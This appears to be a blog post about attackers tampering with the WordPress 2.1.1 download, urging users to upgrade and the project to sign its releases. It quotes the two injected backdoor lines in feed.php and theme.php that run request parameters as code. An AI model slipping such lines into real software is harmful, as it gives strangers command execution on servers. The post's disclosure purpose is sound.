Someone cracked the Wordpress servers and inserted malicious code into 2 of the source files for the popular open source blog software.

If you are running Wordpress v2.1.1 you need to upgrade now! Read their announcement here. This is more serious than your normal round of ’someone found another way to exploit sloppy PHP code’ — someone was able to gain access to their download server, insert code and recreate the distribution file.

They have never had any kind of file integrity checking (GPG signatures are commonly used in Open Source projects), but I think it is high time they implemented them.

They are a bit light on details of the inserted code. It exists in 2 files - feed.php and theme.php, someone inserted this line into feed.php:
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

And in theme.php:
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

What this means is that someone passing the argument ix to feed.php or iz to theme.php could execute PHP code or shell commands on the server with permissions of the running web server. It is as if you opened up a guest account on your system for anyone to use. It could be used to launch spam relays, potentially exploit other security holes to gain root access, or trash your blog.

The Wordpress team needs to take a very serious look at their development process and security procedures. At the least they need to designate someone as the release manager and have them GPG sign the release files so that those of us downloading their software have some level of confidence that it hasn’t been compromised.